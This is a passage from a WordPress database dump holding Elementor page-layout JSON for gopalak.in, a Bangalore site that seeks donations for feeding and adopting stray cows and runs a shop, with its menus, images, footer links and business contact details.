Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12218,2005,'_elementor_page_assets','a:0:{}'),(12220,2006,'_elementor_edit_mode','builder'),(12221,2006,'_elementor_template_type','wp-page'),(12222,2006,'_elementor_version','3.7.8'),(12223,2006,'_wp_page_template','elementor_canvas'),(12224,2006,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12225,2006,'_elementor_page_assets','a:0:{}'),(12228,2007,'_elementor_edit_mode','builder'),(12229,2007,'_elementor_template_type','wp-page'),(12230,2007,'_elementor_version','3.7.8'),(12231,2007,'_wp_page_template','elementor_canvas'),(12232,2007,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[]